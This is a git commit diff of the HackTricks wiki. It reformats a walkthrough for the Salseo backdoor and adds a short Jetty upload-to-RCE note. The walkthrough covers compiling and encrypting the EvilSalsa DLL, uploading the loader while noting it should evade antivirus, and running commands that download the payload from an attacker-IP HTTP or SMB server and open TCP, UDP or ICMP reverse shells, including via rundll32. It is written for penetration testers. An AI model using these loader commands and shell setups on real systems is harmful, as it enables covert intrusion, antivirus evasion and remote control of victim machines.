GitBook: [#3350] No subject
This commit is contained in:
parent
b5f741ec8d
commit
aaef4ab1db
BIN
.gitbook/assets/image (1) (2).png
Normal file
BIN
.gitbook/assets/image (1) (2).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 5.6 KiB |
Binary file not shown.
Before Width: | Height: | Size: 5.6 KiB After Width: | Height: | Size: 755 KiB |
BIN
.gitbook/assets/image (2) (1).png
Normal file
BIN
.gitbook/assets/image (2) (1).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 94 KiB |
Binary file not shown.
Before Width: | Height: | Size: 94 KiB After Width: | Height: | Size: 7.8 KiB |
@ -1,4 +1,4 @@
|
||||
|
||||
# Salseo
|
||||
|
||||
<details>
|
||||
|
||||
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Compiling the binaries
|
||||
## Compiling the binaries
|
||||
|
||||
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
|
||||
|
||||
@ -25,26 +24,26 @@ Compile those projects for the architecture of the windows box where your are go
|
||||
|
||||
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
|
||||
|
||||
(**If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
|
||||
(\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
|
||||
|
||||
![](../.gitbook/assets/image.png)
|
||||
|
||||
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
|
||||
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
![](<../.gitbook/assets/image (1) (2).png>)
|
||||
|
||||
# Prepare the Backdoor
|
||||
## Prepare the Backdoor
|
||||
|
||||
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**:
|
||||
|
||||
## **Python**
|
||||
### **Python**
|
||||
|
||||
```
|
||||
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
|
||||
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
|
||||
```
|
||||
|
||||
## Windows
|
||||
### Windows
|
||||
|
||||
```
|
||||
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
|
||||
@ -55,9 +54,9 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco
|
||||
|
||||
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
|
||||
|
||||
# **Execute the backdoor**
|
||||
## **Execute the backdoor**
|
||||
|
||||
## **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
|
||||
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
|
||||
|
||||
Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
|
||||
|
||||
@ -65,7 +64,7 @@ Remember to start a nc as the reverse shell listener and a HTTP server to serve
|
||||
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
|
||||
```
|
||||
|
||||
## **Getting a UDP reverse shell (downloading encoded dll through SMB)**
|
||||
### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
|
||||
|
||||
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
|
||||
|
||||
@ -73,11 +72,11 @@ Remember to start a nc as the reverse shell listener, and a SMB server to serve
|
||||
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
|
||||
```
|
||||
|
||||
## **Getting a ICMP reverse shell (encoded dll already inside the victim)**
|
||||
### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
|
||||
|
||||
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
|
||||
|
||||
### **Disable ICMP Replies:**
|
||||
#### **Disable ICMP Replies:**
|
||||
|
||||
```
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
@ -86,45 +85,45 @@ sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=0
|
||||
```
|
||||
|
||||
### Execute the client:
|
||||
#### Execute the client:
|
||||
|
||||
```
|
||||
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
|
||||
```
|
||||
|
||||
### Inside the victim, lets execute the salseo thing:
|
||||
#### Inside the victim, lets execute the salseo thing:
|
||||
|
||||
```
|
||||
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
|
||||
```
|
||||
|
||||
# Compiling SalseoLoader as DLL exporting main function
|
||||
## Compiling SalseoLoader as DLL exporting main function
|
||||
|
||||
Open the SalseoLoader project using Visual Studio.
|
||||
|
||||
## Add before the main function: \[DllExport]
|
||||
### Add before the main function: \[DllExport]
|
||||
|
||||
![](<../.gitbook/assets/image (2).png>)
|
||||
![](<../.gitbook/assets/image (2) (1).png>)
|
||||
|
||||
## Install DllExport for this project
|
||||
### Install DllExport for this project
|
||||
|
||||
### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
||||
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
||||
|
||||
![](<../.gitbook/assets/image (3).png>)
|
||||
|
||||
### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||
|
||||
![](<../.gitbook/assets/image (4).png>)
|
||||
|
||||
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
||||
|
||||
## **U**ninstall DllExport
|
||||
### **U**ninstall DllExport
|
||||
|
||||
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
||||
|
||||
![](<../.gitbook/assets/image (5).png>)
|
||||
|
||||
## **Exit Visual Studio and execute DllExport\_configure**
|
||||
### **Exit Visual Studio and execute DllExport\_configure**
|
||||
|
||||
Just **exit** Visual Studio
|
||||
|
||||
@ -134,13 +133,13 @@ Select **x64** (if you are going to use it inside a x64 box, that was my case),
|
||||
|
||||
![](<../.gitbook/assets/image (7).png>)
|
||||
|
||||
## **Open the project again with visual Studio**
|
||||
### **Open the project again with visual Studio**
|
||||
|
||||
**\[DllExport]** should not be longer marked as error
|
||||
|
||||
![](<../.gitbook/assets/image (8).png>)
|
||||
|
||||
## Build the solution
|
||||
### Build the solution
|
||||
|
||||
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
|
||||
|
||||
@ -152,7 +151,7 @@ Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> P
|
||||
|
||||
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
|
||||
|
||||
## Test the generated Dll
|
||||
### Test the generated Dll
|
||||
|
||||
Copy and paste the Dll where you want to test it.
|
||||
|
||||
@ -164,11 +163,11 @@ rundll32.exe SalseoLoader.dll,main
|
||||
|
||||
If no error appears, probably you have a functional DLL!!
|
||||
|
||||
# Get a shell using the DLL
|
||||
## Get a shell using the DLL
|
||||
|
||||
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
|
||||
|
||||
## Powershell
|
||||
### Powershell
|
||||
|
||||
```
|
||||
$env:pass="password"
|
||||
@ -179,7 +178,7 @@ $env:shell="reversetcp"
|
||||
rundll32.exe SalseoLoader.dll,main
|
||||
```
|
||||
|
||||
## CMD
|
||||
### CMD
|
||||
|
||||
```
|
||||
set pass=password
|
||||
@ -190,7 +189,6 @@ set shell=reversetcp
|
||||
rundll32.exe SalseoLoader.dll,main
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
@ -206,5 +204,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
</details>
|
||||
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
|
||||
![](<../../.gitbook/assets/image (2).png>)
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
@ -106,6 +106,12 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l
|
||||
|
||||
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
|
||||
|
||||
## **Jetty RCE**
|
||||
|
||||
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
|
||||
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
## **wget File Upload/SSRF Trick**
|
||||
|
||||
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
|
||||
|
Loading…
Reference in New Issue
Block a user